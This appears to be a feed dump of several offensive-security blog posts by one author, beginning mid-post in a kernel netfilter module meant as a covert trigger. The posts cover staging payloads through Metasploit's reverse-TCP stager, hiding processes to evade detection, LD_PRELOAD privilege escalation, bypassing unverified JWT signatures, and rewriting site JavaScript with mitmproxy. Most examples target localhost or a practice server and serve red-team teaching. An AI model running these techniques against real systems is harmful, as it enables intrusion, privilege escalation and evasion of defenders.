class="n">nf_hook_ops</span><span class="p">),</span> <span class="n">GFP_KERNEL</span><span class="p">);</span> <span class="n">nfho</span><span class="o">-&gt;</span><span class="n">hook</span> <span class="o">=</span> <span class="p">(</span><span class="n">nf_hookfn</span><span class="o">*</span><span class="p">)</span><span class="n">hfunc</span><span class="p">;</span> <span class="n">nfho</span><span class="o">-&gt;</span><span class="n">hooknum</span> <span class="o">=</span> <span class="n">NF_INET_PRE_ROUTING</span> <span class="n">nfho</span><span class="o">-&gt;</span><span class="n">pf</span> <span class="o">=</span> <span class="n">PF_INET</span><span class="p">;</span> <span class="n">nfho</span><span class="o">-&gt;</span><span class="n">priority</span> <span class="o">=</span> <span class="n">NF_IP_PRI_FIRST</span><span class="p">;</span> <span class="n">nf_register_net_hook</span><span class="p">(</span><span class="o">&amp;</span><span class="n">init_net</span><span class="p">,</span> <span class="n">nfho</span><span class="p">);</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> <span class="k">static</span> <span class="kt">void</span> <span class="n">__exit</span> <span class="nf">LKM_exit</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span> <span class="n">nf_unregister_net_hook</span><span class="p">(</span><span class="o">&amp;</span><span class="n">init_net</span><span class="p">,</span> <span class="n">nfho</span><span class="p">);</span> <span class="n">kfree</span><span class="p">(</span><span class="n">nfho</span><span class="p">);</span> <span class="p">}</span> </code></pre> </div> <p>I'm concealing how to compile the module, and there's one obvious section omitted from the code. Not an obstacle to any practitioner.</p> <p>Install the module, follow dmesg, and then issue curls to a locally running HTTP server on port 8000. Here's two different requests coming in:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>[1690319.162544] payload does not match! GET /foo/bar HTTP/1.1 [1690335.073880] payload matches! GET /abracadabra/some_interesting_data HTTP/1.1 </code></pre> </div> <p>Adding trigger behavior to turn this into a dropper should be very doable. That would be closely related to the previous post: <a href="https://dev.to/fx2301/using-metasploit-to-stage-your-own-payloads-52d5">Using metasploit to stage your own payload</a>.</p> defenseevasion redteam kernelmodule c2 Using metasploit to stage your own payloads fx2301 Fri, 02 Dec 2022 01:37:51 +0000 https://forem.com/fx2301/using-metasploit-to-stage-your-own-payloads-52d5 https://forem.com/fx2301/using-metasploit-to-stage-your-own-payloads-52d5 <h1> Why? </h1> <p>You want to make your C2 framework interoperable with metasploit framework so that you can deliver your own payloads post-exploit (Cobalt Strike does this).</p> <h1> When? </h1> <p>Your payload is position-independent code, fits within 4096 bytes, and delivering your payload in the clear is an acceptable indicator of compromise.</p> <h1> How? </h1> <p>This is a worked exampled for Linux x64 architecture.</p> <h2> Inspecting metasploit's stager code </h2> <p>Take a look at the source for <a href="https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/linux/x64/stager_sock_reverse.s" rel="noopener noreferrer">stager_sock_reverse</a> - the stager for <code>linux/x64/shell/reverse_tcp</code>. </p> <p>Here's what's going on:</p> <ol> <li>It allocates 4k of RAM for your payload,</li> <li>connects to <code>LHOST</code>:<code>LPORT</code> over TCP,</li> <li>reads max 4k into RAM, and</li> <li>jumps to the start of your payload.</li> </ol> <p>Note that <code>LHOST</code> and <code>LPORT</code> are hardcoded as <code>127.0.0.1</code> (<code>0x0100007f</code>) and <code>5555</code> (<code>0xb315</code>) respectively from <code>movabs $0x100007fb3150002, %rcx</code>. We don't care about this in the general case, because metasploit will override them based on our exploit options, but it matters for this demonstration.</p> <h2> Crafting a Hello World payload </h2> <p>This assembler is the bare minimum for a print statement that exits cleanly:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>.global _start _start: movabs $0x0A0D216f6c6c6548, %rcx # "Hello!\r\n" push %rcx mov %rsp, %rsi # const char *buf mov $1, %rdi # int fd (stdout) mov $8, %rdx # size_t size mov $1, %rax # sys_write syscall mov $0, %rdi # int error_code mov $60, %rax # sys_exit syscall nop # 0x90 </code></pre> </div> <p>We compile like so:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>$ gcc -s -static -nostdlib hello_world.s -o hello_world </code></pre> </div> <p>This gives us an ELF executable (which is much more than we want):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>$ file hello_world hello_world: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped </code></pre> </div> <p>We can find the offset to the code we want with hexdump (note, that our <code>nop</code> instruction is <code>90</code> in hex and is at position 0x1036):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>$ hexdump -C hello_world 00000000 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 |.ELF............| ...snip... * 00001000 48 b9 48 65 6c 6c 6f 21 0d 0a 51 48 89 e6 48 c7 |H.Hello!..QH..H.| 00001010 c7 01 00 00 00 48 c7 c2 08 00 00 00 48 c7 c0 01 |.....H......H...| 00001020 00 00 00 0f 05 48 c7 c7 00 00 00 00 48 c7 c0 3c |.....H......H..&lt;| 00001030 00 00 00 0f 05 90 00 2e 73 68 73 74 72 74 61 62 |........shstrtab| </code></pre> </div> <p>We can then extract just our payload with dd:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>$ dd if=hello_world ibs=1 \ skip=$((0x1000)) count=$((0x36)) of=payload </code></pre> </div> <h2> Putting it all together </h2> <p>First, we serve our payload at the default <code>LPORT</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>$ nc -nlvp 5555 &lt; payload &amp; Listening on 0.0.0.0 5555 </code></pre> </div> <p>Next we compile metasploit's stager from a local checkout:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>$ gcc -nostdlib metasploit-framework/external/source/shellcode/linux/x64/stager_sock_reverse.s \ -o stager_sock_reverse </code></pre> </div> <p>Then we run the stager which grabs the payload and it executes:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>$ ./stager_sock_reverse Connection received on 127.0.0.1 38126 Hello! </code></pre> </div> <p>Success!</p> beginners programming Process hiding in Linux fx2301 Wed, 19 Oct 2022 18:31:54 +0000 https://forem.com/fx2301/process-hiding-in-linux-5c45 https://forem.com/fx2301/process-hiding-in-linux-5c45 <h1> Why? </h1> <p>You want to evade detection post compromise of a host, and hide your process as something innocuous when someone inspects <code>/proc</code> or <code>ps</code>. </p> <h1> When? </h1> <p>You're host is Linux, and your executable is in C, or a language with FFI support.</p> <h1> How? </h1> <p>There are two classes of data to spoof:</p> <ol> <li>The contents of <code>/proc/pid/cmdline</code>. This is what shows up with <code>ps -f</code>.</li> <li>The contents of <code>/proc/pid/comm</code> and the first line of <code>/proc/pid/status</code>. This is what shows up with <code>ps</code> without <code>-f</code>.</li> </ol> <h2> In <code>nim</code> </h2> <div class="highlight js-code-highlight"> <pre class="highlight nim"><code><span class="k">import</span> <span class="n">os</span> <span class="k">proc </span><span class="nf">NimMain</span><span class="p">()</span> <span class="p">{.</span><span class="n">cdecl</span><span class="p">,</span> <span class="n">importc</span><span class="p">.}</span> <span class="k">proc </span><span class="nf">syscall</span><span class="p">(</span><span class="n">number</span><span class="p">:</span> <span class="n">clong</span><span class="p">):</span> <span class="n">clong</span> <span class="p">{.</span><span class="n">importc</span><span class="p">,</span> <span class="n">varargs</span><span class="p">,</span> <span class="n">header</span><span class="p">:</span> <span class="s">"sys/syscall.h"</span><span class="p">.}</span> <span class="k">var</span> <span class="n">NR_PRCTL</span> <span class="p">{.</span><span class="n">importc</span><span class="p">:</span> <span class="s">"__NR_prctl"</span><span class="p">,</span> <span class="n">header</span><span class="p">:</span> <span class="s">"unistd.h"</span><span class="p">.}:</span> <span class="kt">int</span> <span class="k">var</span> <span class="n">PR_SET_NAME</span> <span class="p">{.</span><span class="n">importc</span><span class="p">:</span> <span class="s">"PR_SET_NAME"</span><span class="p">,</span> <span class="n">header</span><span class="p">:</span> <span class="s">"sys/prctl.h"</span><span class="p">.}:</span> <span class="kt">int</span> <span class="k">proc </span><span class="nf">main</span><span class="p">(</span><span class="n">argc</span><span class="p">:</span> <span class="kt">int</span><span class="p">,</span> <span class="n">argv</span><span class="p">:</span> <span class="n">cstringArray</span><span class="p">,</span> <span class="n">envp</span><span class="p">:</span> <span class="n">cstringArray</span><span class="p">):</span> <span class="kt">int</span> <span class="p">{.</span><span class="n">cdecl</span><span class="p">,</span> <span class="n">exportc</span><span class="p">.}</span> <span class="o">=</span> <span class="n">NimMain</span><span class="p">()</span> <span class="k">const</span> <span class="n">FAKE_COMMAND</span> <span class="o">=</span> <span class="s">"spoofed"</span> <span class="c"># handles /proc/pid/comm and /proc/pid/status</span> <span class="k">discard</span> <span class="n">syscall</span><span class="p">(</span><span class="n">NR_PRCTL</span><span class="p">,</span> <span class="n">PR_SET_NAME</span><span class="p">,</span> <span class="n">cstring</span><span class="p">(</span><span class="n">FAKE_COMMAND</span><span class="p">))</span> <span class="c"># handles /proc/pid/cmdline</span> <span class="k">let</span> <span class="n">totalLength</span> <span class="o">=</span> <span class="n">len</span><span class="p">(</span><span class="n">argv</span><span class="o">[</span><span class="mi">0</span><span class="o">]</span><span class="p">)</span> <span class="k">var</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span> <span class="k">for</span> <span class="n">ch</span> <span class="ow">in</span> <span class="n">FAKE_COMMAND</span><span class="p">:</span> <span class="n">argv</span><span class="o">[</span><span class="mi">0</span><span class="o">][</span><span class="n">i</span><span class="o">]</span> <span class="o">=</span> <span class="n">FAKE_COMMAND</span><span class="o">[</span><span class="n">i</span><span class="o">]</span> <span class="n">i</span> <span class="o">+=</span> <span class="mi">1</span> <span class="n">argv</span><span class="o">[</span><span class="mi">0</span><span class="o">][</span><span class="n">i</span><span class="o">]</span> <span class="o">=</span> <span class="sc">'</span><span class="se">\x00</span><span class="sc">'</span> <span class="k">for</span> <span class="n">j</span> <span class="ow">in</span> <span class="n">i</span> <span class="p">..</span> <span class="n">totalLength</span><span class="p">:</span> <span class="n">argv</span><span class="o">[</span><span class="mi">0</span><span class="o">][</span><span class="n">j</span><span class="o">]</span> <span class="o">=</span> <span class="sc">'</span><span class="se">\x00</span><span class="sc">'</span> <span class="n">sleep</span><span class="p">(</span><span class="mi">60000</span><span class="p">)</span> </code></pre> </div> <ul> <li>Note that you'll need to compile this with <code>--nomain</code>.</li> <li>Note that as argc and envp is consecutive in memory this means that a longer <code>FAKE_COMMAND</code> than the actual <code>argv[0]</code> means we overwrite the contents of <code>/proc/pid/environ</code>. To work around this, ensure your executable has a longer name than the what you want to spoof as.</li> </ul> redteam cybersecurity defenseevasion processhiding PrivEsc with LD_PRELOAD fx2301 Sat, 15 Oct 2022 17:55:22 +0000 https://forem.com/fx2301/privesc-with-ldpreload-4fhh https://forem.com/fx2301/privesc-with-ldpreload-4fhh <h1> Why? </h1> <p>You need root access on a Linux host.</p> <h1> When? </h1> <p>You have write access to the file-system, can set environment variables for root, and root runs processes.</p> <h1> How? </h1> <ol> <li>Craft a C program with an <code>init</code> function registered with <code>.init_array</code>.</li> <li>Compile the C program as an .so binary for the matching architecture.</li> <li>Write the binary to the target host's filesystem.</li> <li>Set the LD_PRELOAD environment variable.</li> <li>Wait for or trigger the root process execution.</li> </ol> <h1> Example </h1> <div class="highlight js-code-highlight"> <pre class="highlight c"><code><span class="cp">#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp"> </span> <span class="kt">void</span> <span class="nf">init</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">envp</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// PrivEsc hook</span> <span class="p">}</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">section</span><span class="p">(</span><span class="s">".init_array"</span><span class="p">)))</span> <span class="n">typeof</span><span class="p">(</span><span class="n">init</span><span class="p">)</span> <span class="o">*</span><span class="n">__init</span> <span class="o">=</span> <span class="n">init</span><span class="p">;</span> </code></pre> </div> ethicalhacking redteam cybersecurity privesc Exploiting unverified JWT signatures fx2301 Wed, 19 Jan 2022 19:47:27 +0000 https://forem.com/fx2301/exploiting-unverified-jwt-signatures-554p https://forem.com/fx2301/exploiting-unverified-jwt-signatures-554p <h2> Why? </h2> <p>Bypassing authentication is a major win as an attacker.</p> <h2> When? </h2> <p>Test for this exploit against all JWT implementations. It's so fast to do.</p> <h2> How? </h2> <p>Use the tool I've written, <a href="https://github.com/fx2301/jwt_attack">jwt_attack</a>. Alternatively, make a whitespace modification to the header or payload, and use the unmodified signature. If the modified JWT is accepted then that means you can craft any payload you want.</p> <h3> Safe practice </h3> <p>The <a href="https://github.com/fx2301/jwt_attack">jwt_attack repo</a> comes with a <a href="https://github.com/fx2301/jwt_attack/blob/master/vulnerable.py">vulnerable server</a> that you can attack.</p> <h3> Using <code>jwt_attack</code> </h3> <p>We pass the entire curl statement along with our desired JWT payload:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>python3 jwt_attack.py <span class="nt">--target-payload</span> <span class="s1">'{"username":"admin"}'</span> <span class="se">\</span> curl http://localhost:5000/signature_not_verified <span class="se">\</span> <span class="nt">-H</span> <span class="s1">'Authorization: eyJhbGciOiAiSFMyNTYifQ.eyJ1c2VybmFtZSI6ICJndWVzdCJ9.8M9vvlmK1mLe13Wa6vVMq2nCz3_jRXss-0gLTGq6JAU'</span> </code></pre> </div> <p>We get back a token for our desired JWT payload as well as the curl statement to use:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Testing for identical results... Attempting attack: signature not verified ... SUCCESS Attempting attack: none algorithm allowed ... FAILURE Successful JWT: { "token": "eyJhbGciOiAiSFMyNTYiLCAicmFuZG9tIjogMC45ODM4NzE4NTA0NzEyODk5fQ.eyJ1c2VybmFtZSI6ICJhZG1pbiJ9.8M9vvlmK1mLe13Wa6vVMq2nCz3_jRXss-0gLTGq6JAU", "header": { "alg": "HS256", "random": 0.9838718504712899 }, "payload": { "username": "admin" }, "signature": "8M9vvlmK1mLe13Wa6vVMq2nCz3_jRXss-0gLTGq6JAU" } Successful curl command: curl http://localhost:5000/signature_not_verified -H 'Authorization: eyJhbGciOiAiSFMyNTYiLCAicmFuZG9tIjogMC45ODM4NzE4NTA0NzEyODk5fQ.eyJ1c2VybmFtZSI6ICJhZG1pbiJ9.8M9vvlmK1mLe13Wa6vVMq2nCz3_jRXss-0gLTGq6JAU' </code></pre> </div> <h3> By hand </h3> <p>First let's decode the payload:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">echo</span> <span class="s1">'eyJ1c2VybmFtZSI6ICJndWVzdCJ9'</span> | <span class="nb">base64</span> <span class="nt">-d</span> <span class="o">{</span><span class="s2">"username"</span>: <span class="s2">"guest"</span><span class="o">}</span> </code></pre> </div> <p>Now we add some whitespace:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">echo</span> <span class="s1">'{"username": "guest" }'</span> | <span class="nb">base64 </span><span class="nv">eyJ1c2VybmFtZSI6ICJndWVzdCIgfQo</span><span class="o">=</span> </code></pre> </div> <p>Note that we have to be careful here because JWTs use a <a href="https://en.wikipedia.org/wiki/Base64#The_URL_applications">URL-safe variation of base64 encoding</a>. In this case it means simply dropping the padding.</p> <p>We put our token back together and retest our curl statement:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>curl http://localhost:5000/signature_not_verified <span class="se">\</span> <span class="nt">-H</span> <span class="s1">'Authorization: eyJhbGciOiAiSFMyNTYifQ.eyJ1c2VybmFtZSI6ICJndWVzdCIgfQo.8M9vvlmK1mLe13Wa6vVMq2nCz3_jRXss-0gLTGq6JAU'</span> </code></pre> </div> <p>We see the same response as we do with the unmodified token. So now we know we can make changes to our payload!<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="nt">&lt;p&gt;</span>Not quite. Your username needs to be admin.<span class="nt">&lt;/p&gt;</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">echo</span> <span class="s1">'{"username": "admin"}'</span> | <span class="nb">base64 </span><span class="nv">eyJ1c2VybmFtZSI6ICJhZG1pbiJ9Cg</span><span class="o">==</span> </code></pre> </div> <p>Once against we reassemble our JWT and issue our new curl statement:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>curl http://localhost:5000/signature_not_verified <span class="se">\</span> <span class="nt">-H</span> <span class="s1">'Authorization: eyJhbGciOiAiSFMyNTYifQ.eyJ1c2VybmFtZSI6ICJhZG1pbiJ9Cg.8M9vvlmK1mLe13Wa6vVMq2nCz3_jRXss-0gLTGq6JAU'</span> </code></pre> </div> <p>We're in!<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="nt">&lt;p&gt;</span>Success! Your username is admin.<span class="nt">&lt;/p&gt;</span> </code></pre> </div> <p><small>Art licensed under Creative Commons by <a href="https://pixabay.com/users/openclipart-vectors-30363/">OpenClipart-Vectors</a></small></p> jwt ethicalhacking redteam cybersecurity GraphQL API recon with mitmproxy fx2301 Sat, 15 Jan 2022 02:03:08 +0000 https://forem.com/fx2301/graphql-api-recon-with-mitmproxy-2f5d https://forem.com/fx2301/graphql-api-recon-with-mitmproxy-2f5d <h2> Why? </h2> <p>Capturing live examples of GraphQL queries and responses all in one place vastly simplifies recon.</p> <h2> When? </h2> <p>You most want to do this when introspection is disabled. Otherwise when you need examples to help make sense of the API's semantics, or to develop a better intuition for where the weaknesses may be.</p> <h2> How? </h2> <p>This script works out-of-the-box for the majority scenario: POST requests to <code>/graphql</code> that use the <code>operationName</code> parameter.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>mitmdump <span class="nt">-s</span> capture.py </code></pre> </div> <p>capture.py:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="nn">json</span> <span class="kn">import</span> <span class="nn">re</span> <span class="kn">from</span> <span class="nn">mitmproxy</span> <span class="kn">import</span> <span class="n">http</span> <span class="k">def</span> <span class="nf">response</span><span class="p">(</span><span class="n">flow</span><span class="p">:</span> <span class="n">http</span><span class="p">.</span><span class="n">HTTPFlow</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="bp">None</span><span class="p">:</span> <span class="k">if</span> <span class="n">flow</span><span class="p">.</span><span class="n">request</span><span class="p">.</span><span class="n">url</span><span class="p">.</span><span class="n">endswith</span><span class="p">(</span><span class="s">'/graphql'</span><span class="p">):</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">json</span><span class="p">.</span><span class="n">loads</span><span class="p">(</span><span class="n">flow</span><span class="p">.</span><span class="n">request</span><span class="p">.</span><span class="n">content</span><span class="p">.</span><span class="n">decode</span><span class="p">(</span><span class="s">'utf-8'</span><span class="p">))</span> <span class="n">filename</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">sub</span><span class="p">(</span><span class="sa">r</span><span class="s">'[^a-zA-Z0-9]'</span><span class="p">,</span> <span class="s">'_'</span><span class="p">,</span> <span class="n">payload</span><span class="p">[</span><span class="s">'operationName'</span><span class="p">])</span> <span class="o">+</span> <span class="s">'.example.txt'</span> <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">filename</span><span class="p">,</span> <span class="s">'w'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span> <span class="n">json</span><span class="p">.</span><span class="n">dump</span><span class="p">(</span><span class="n">payload</span><span class="p">,</span> <span class="n">fp</span><span class="o">=</span><span class="n">f</span><span class="p">,</span> <span class="n">indent</span><span class="o">=</span><span class="mi">2</span><span class="p">)</span> <span class="n">f</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="sa">f</span><span class="s">"</span><span class="se">\n\n</span><span class="s">// ==== REQUEST ====</span><span class="se">\n\n</span><span class="s">"</span><span class="p">)</span> <span class="n">f</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="sa">f</span><span class="s">"</span><span class="si">{</span><span class="n">payload</span><span class="p">[</span><span class="s">'query'</span><span class="p">]</span><span class="si">}</span><span class="se">\n\n</span><span class="s">"</span><span class="p">)</span> <span class="n">f</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"// ==== RESPONSE ====</span><span class="se">\n\n</span><span class="s">"</span><span class="p">)</span> <span class="n">json</span><span class="p">.</span><span class="n">dump</span><span class="p">(</span><span class="n">json</span><span class="p">.</span><span class="n">loads</span><span class="p">(</span><span class="n">flow</span><span class="p">.</span><span class="n">response</span><span class="p">.</span><span class="n">content</span><span class="p">),</span> <span class="n">fp</span><span class="o">=</span><span class="n">f</span><span class="p">,</span> <span class="n">indent</span><span class="o">=</span><span class="mi">2</span><span class="p">)</span> </code></pre> </div> ethicalhacking cybersecurity recon graphql Modifying a site's JavaScript with mitmproxy fx2301 Fri, 14 Jan 2022 17:35:57 +0000 https://forem.com/fx2301/modifying-a-sites-javascript-with-mitmproxy-1beo https://forem.com/fx2301/modifying-a-sites-javascript-with-mitmproxy-1beo <h2> Why? </h2> <p>You want to bypass client-side constraints in a JavaScript app you're hacking.</p> <h2> When? </h2> <p>Easiest to do when <code>&lt;script integrity&gt;</code> (<a href="https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity">Subresource Integrity</a>) is not in use.</p> <h2> How? </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>mitmdump <span class="nt">-s</span> myscript.py </code></pre> </div> <p>myscript.py:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="nn">mitmproxy</span> <span class="kn">import</span> <span class="n">http</span> <span class="k">def</span> <span class="nf">response</span><span class="p">(</span><span class="n">flow</span><span class="p">:</span> <span class="n">http</span><span class="p">.</span><span class="n">HTTPFlow</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="bp">None</span><span class="p">:</span> <span class="k">if</span> <span class="n">flow</span><span class="p">.</span><span class="n">response</span> <span class="ow">and</span> <span class="n">flow</span><span class="p">.</span><span class="n">response</span><span class="p">.</span><span class="n">content</span><span class="p">:</span> <span class="n">flow</span><span class="p">.</span><span class="n">response</span><span class="p">.</span><span class="n">content</span> <span class="o">=</span> <span class="n">flow</span><span class="p">.</span><span class="n">response</span><span class="p">.</span><span class="n">content</span><span class="p">.</span><span class="n">replace</span><span class="p">(</span> <span class="n">UNHACKED_FRAGMENT</span><span class="p">,</span> <span class="n">HACKED_FRAGMENT</span> <span class="p">)</span> </code></pre> </div> <h2> Gotchas </h2> <p>One mistake you can make it trying to replace the fragments of code you see in your browser debugger. That won't necessarily correspond 1-1 (e.g. in the case of unobfuscated code). That's why the examples here don't match against variable names or internal function names.</p> <h2> Examples </h2> <h3> Disabling logic guards </h3> <p>unhacked.js:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">email</span><span class="p">.</span><span class="nx">endswith</span><span class="p">(</span><span class="dl">'</span><span class="s1">@trusted.com</span><span class="dl">'</span><span class="p">))</span> <span class="p">{</span> <span class="k">return</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <p>hacked.js:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">email</span><span class="p">.</span><span class="nx">includes</span><span class="p">(</span><span class="dl">'</span><span class="s1">@</span><span class="dl">'</span><span class="p">))</span> <span class="p">{</span> <span class="k">return</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <p>script.py:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">flow</span><span class="p">.</span><span class="n">response</span><span class="p">.</span><span class="n">content</span> <span class="o">=</span> <span class="n">flow</span><span class="p">.</span><span class="n">response</span><span class="p">.</span><span class="n">content</span><span class="p">.</span><span class="n">replace</span><span class="p">(</span> <span class="sa">b</span><span class="s">'endsWith("@trusted.com")'</span><span class="p">,</span> <span class="sa">b</span><span class="s">'includes("@")'</span> <span class="p">)</span> </code></pre> </div> <h3> Adding allowed file extensions for upload </h3> <p>unhacked.js:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">const</span> <span class="nx">allowed</span> <span class="o">=</span> <span class="p">[</span><span class="dl">'</span><span class="s1">png</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">jpg</span><span class="dl">'</span><span class="p">];</span> </code></pre> </div> <p>hacked.js:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">const</span> <span class="nx">allowed</span> <span class="o">=</span> <span class="p">[</span><span class="dl">'</span><span class="s1">png</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">exe</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">jpg</span><span class="dl">'</span><span class="p">];</span> </code></pre> </div> <p>script.py:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>flow.response.content = flow.response.content.replace( b"'png',", b"'png','exe'," ) </code></pre> </div> <p><small>Art licensed under Creative Commons by <a href="https://pixabay.com/users/openclipart-vectors-30363">OpenClipart-Vectors</a></small></p> javascript cybersecurity ethicalhacking mitm Unpacking js.map files fx2301 Fri, 14 Jan 2022 16:50:59 +0000 https://forem.com/fx2301/unpacking-jsmap-files-4fl0 https://forem.com/fx2301/unpacking-jsmap-files-4fl0 <h2> Why? </h2> <p>You want to review JavaScript for vulnerabilities outside of the browser.</p> <h2> When? </h2> <p>This can be done when <code>.js.map</code> files are available. The hint will be unofusicated code in the browser debugger, and <code>//# sourceMappingURL=</code> lines on the end of obfusicated <code>.js</code> files.</p> <h2> How? </h2> <p><code>unpack</code> failed on some content for me and consumed the first character of filenames. <a href="https://www.npmjs.com/package/source-map-unpacker">source-map-unpacker</a> worked well:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>npm <span class="nb">install </span>source-map-unpacker node ./node_modules/source-map-unpacker/unmap.js <span class="se">\</span> <span class="nt">-p</span> code.js.map <span class="nt">-o</span> code </code></pre> </div> <p><small>Art licensed under Creative Commons by <a href="https://www.flickr.com/photos/gforsythe">gforsythe</a></small></p> ethicalhacking hacking cybersecurity javascript